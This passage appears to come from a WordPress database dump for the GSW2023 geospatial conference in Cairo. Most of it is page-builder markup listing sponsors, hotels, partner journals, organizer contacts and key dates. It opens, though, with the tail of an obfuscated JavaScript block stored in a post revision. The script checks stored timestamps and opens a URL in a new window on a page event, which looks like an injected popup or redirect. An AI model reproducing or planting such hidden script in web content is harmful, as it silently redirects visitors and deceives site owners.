_0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 12:23:56','2023-08-13 12:23:56','',3066,'https://gsw2023.com/?p=5108',0,'revision','',0),
(5109,1,'2023-08-13 12:24:51','2023-08-13 12:24:51','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 125px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" 